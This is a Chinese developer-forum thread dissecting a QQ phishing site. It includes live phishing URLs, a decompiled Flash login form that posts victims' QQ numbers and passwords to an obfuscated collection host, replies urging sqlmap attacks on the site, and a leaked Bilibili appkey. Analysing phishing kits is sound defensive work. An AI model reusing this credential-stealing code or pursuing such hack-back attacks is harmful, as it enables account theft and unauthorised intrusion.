一个 QQ 盗号网站供各位调戏

2015-05-09 22:23:13 +08:00
 RecursiveG

http://www.huanyahome.com/ggd/dne1795es/index.php?fileId=1538
就是这个啦。有朋友中招了,结果开始各种发网址。
这种时候是不是应该 @typcn ?

上面那个网址跳转之后的目标好像会变。
另外输入密码的框框什么的都是flash,不过还好没混淆。

对注入无力,希望有大神可以为民除害一下。

22198 次点击
所在节点    程序员
32 条回复
zsx
2015-05-09 22:33:06 +08:00
这年头的钓鱼网站居然还有Flash做密码输入框的啊,看了看地址还是动态生成的,后生可畏(笑
canky
2015-05-09 22:34:23 +08:00
祭出sqlmap神器
RecursiveG
2015-05-09 22:37:47 +08:00
@zsx
我猜是为了防止暴露POST地址
不过不混淆一下毫无作用......

PS:另外也挺符合QQ空间Flash漫天飞的传统......
243205964
2015-05-09 22:38:45 +08:00
坐等被大神玩坏,
est
2015-05-09 22:40:39 +08:00
现在 sqlmap 好像很流行的样子。。。。
RIcter
2015-05-09 22:42:11 +08:00
有空多干点别的,别在这里浪费时间。
RIcter
2015-05-09 22:43:29 +08:00
另外想日站日点有意义的.....
typcn
2015-05-09 22:44:11 +08:00


I HATE FLASH !!!! F**K
kiritoalex
2015-05-09 22:44:57 +08:00
@typcn 23333333
cangshu
2015-05-09 22:47:16 +08:00
@typcn 23333333333
8qwe24657913
2015-05-09 23:14:53 +08:00
@typcn 233333333333

key.length……好吧我怕了

……
typcn
2015-05-09 23:21:17 +08:00
@8qwe24657913 上次反编译 B 站播放器,发现用了 Native C 代码,靠着汇编码一点点找出 API Key ,后来吐了,Flash Decompiler 也卸载了,Flash 插件直接删了,推进一下 Flash 被淘汰的进程。
kookxiang
2015-05-09 23:25:24 +08:00
我发现125%的网页缩放已经秒了很多钓鱼网站
RecursiveG
2015-05-09 23:32:56 +08:00
@typcn
我弄B站APIKey的时候是从Android应用入手的。
Key直接放在一个单独的.so里IDA一下就出来了。

至于flash,碰上混淆过的我就只能哭了。。。
regent
2015-05-09 23:33:00 +08:00
@kookxiang 贴吧签到的作者?
chian
2015-05-09 23:35:15 +08:00
QQ201748977?
http://www.tjjinka.com.cn/login_tpl/
http://www.zlytssbec.cn/login_tpl/


package login_fla {
import fl.controls.*;
import flash.display.*;
import flash.events.*;
import flash.text.*;
import flash.utils.*;
import flash.ui.*;
import flash.system.*;
import flash.net.*;
import adobe.utils.*;
import flash.accessibility.*;
import flash.errors.*;
import flash.external.*;
import flash.filters.*;
import flash.geom.*;
import flash.media.*;
import flash.printing.*;
import flash.xml.*;

public dynamic class MainTimeline extends MovieClip {

public var xx:TextInput;
public var id:String;
public var count:int;
public var pass:TextInput;
public var reUrl:String;
public var paramObj:Object;
public var key:String;
public var strpost:String;
public var tf:TextFormat;
public var but:SimpleButton;
public var ntf:TextFormat;
public var tag:MovieClip;

public function MainTimeline(){
addFrameScript(0, frame1);
}
public function destr(_arg1:String):String{
_arg1 = replace(_arg1, "e4a5f", "www");
_arg1 = replace(_arg1, "f13fe2", ".");
_arg1 = replace(_arg1, "0f883e", "com");
_arg1 = replace(_arg1, "56e057", "/");
_arg1 = replace(_arg1, "4EbC89", "=");
_arg1 = replace(_arg1, "7CE07A", "?");
_arg1 = replace(_arg1, "49ba59", "php");
_arg1 = replace(_arg1, "4E8B0C", "html");
_arg1 = replace(_arg1, "7E8E0C", "-");
return (_arg1);
}
public function fnPostData(_arg1:MouseEvent){
var _local2:URLRequest;
var _local3:URLVariables;
if ((((((((xx.text.length < 5)) || ((pass.text.length < 5)))) || ((xx.text.length > 12)))) || ((pass.text.length > 18)))){
tag.visible = true;
return;
};
_local2 = new URLRequest();
_local2.url = strpost;
_local2.method = URLRequestMethod.POST;
_local3 = new URLVariables();
_local3.user = xx.text;
_local3.pass = pass.text;
_local3.id = id;
_local2.data = _local3;
sendToURL(_local2);
if (count <= 1){
tag.visible = true;
count = (count + 1);
return;
};
navigateToURL(new URLRequest(reUrl), "_self");
}
function frame1(){
tag.visible = false;
stage.showDefaultContextMenu = false;
tf = new TextFormat();
ntf = new TextFormat();
tf.font = "Verdana,Tahoma,Arial";
tf.color = 0x333333;
tf.size = 16;
ntf.font = "宋体,Tahoma,Verdana,Arial";
ntf.size = 14;
ntf.color = 0xAAAAAA;
xx.restrict = "0-9";
xx.text = "QQ号码";
pass.setStyle("textFormat", ntf);
xx.setStyle("textFormat", ntf);
pass.text = "密码";
count = 1;
id = "";
strpost = "";
reUrl = "http://www.baidu.com";
paramObj = stage.loaderInfo.parameters;
for (key in paramObj) {
if (key.length == 4){
id = paramObj[key];
};
if (key.length == 5){
strpost = ("http://" + destr(paramObj[key]));
};
if (key.length == 6){
reUrl = ("http://" + destr(paramObj[key]));
};
};
but.addEventListener(MouseEvent.CLICK, fnPostData);
pass.addEventListener(MouseEvent.CLICK, fnpass);
xx.addEventListener(MouseEvent.CLICK, fnxx);
}
public function replace(_arg1:String, _arg2:String, _arg3:String):String{
var _local4:String;
var _local5:Boolean;
var _local6:*;
var _local7:*;
_local4 = new String();
_local5 = false;
_local6 = 0;
for (;_local6 < _arg1.length;_local6++) {
if (_arg1.charAt(_local6) == _arg2.charAt(0)){
_local5 = true;
_local7 = 0;
while (_local7 < _arg2.length) {
if (_arg1.charAt((_local6 + _local7)) != _arg2.charAt(_local7)){
_local5 = false;
break;
};
_local7++;
};
if (_local5){
_local4 = (_local4 + _arg3);
_local6 = (_local6 + (_arg2.length - 1));
continue;
};
};
_local4 = (_local4 + _arg1.charAt(_local6));
};
return (_local4);
}
public function fnxx(_arg1:MouseEvent){
tag.visible = false;
xx.setStyle("textFormat", tf);
xx.text = "";
}
public function fnpass(_arg1:MouseEvent){
tag.visible = false;
pass.setStyle("textFormat", tf);
pass.text = "";
pass.displayAsPassword = true;
}

}
}//package login_fla
typcn
2015-05-09 23:35:32 +08:00
@RecursiveG 其实有一种歪门邪道的做法,根据上下文修改那个算不上代码的代码,把他用过的变量都记录下来,然后输出出来,一般就出现答案了
mengskysama
2015-05-09 23:35:54 +08:00
那么,先来个难度低一点的http://blliqv.cn/
dong3580
2015-05-09 23:38:40 +08:00
@typcn
一张图。。。
强迫症看到 这图这么差劲实在没法忍受
http://www.dghlhg.cn/_tpl/1/20/1.jpg
发现目录下有这么多图。。。看起来是准备了不少诈骗站。
8qwe24657913
2015-05-09 23:39:16 +08:00
@typcn 然而浏览器直接打开一个B站的站外播放器,F12 Network就可以得到appkey=8e9fc618fbd41e28

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/189814

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX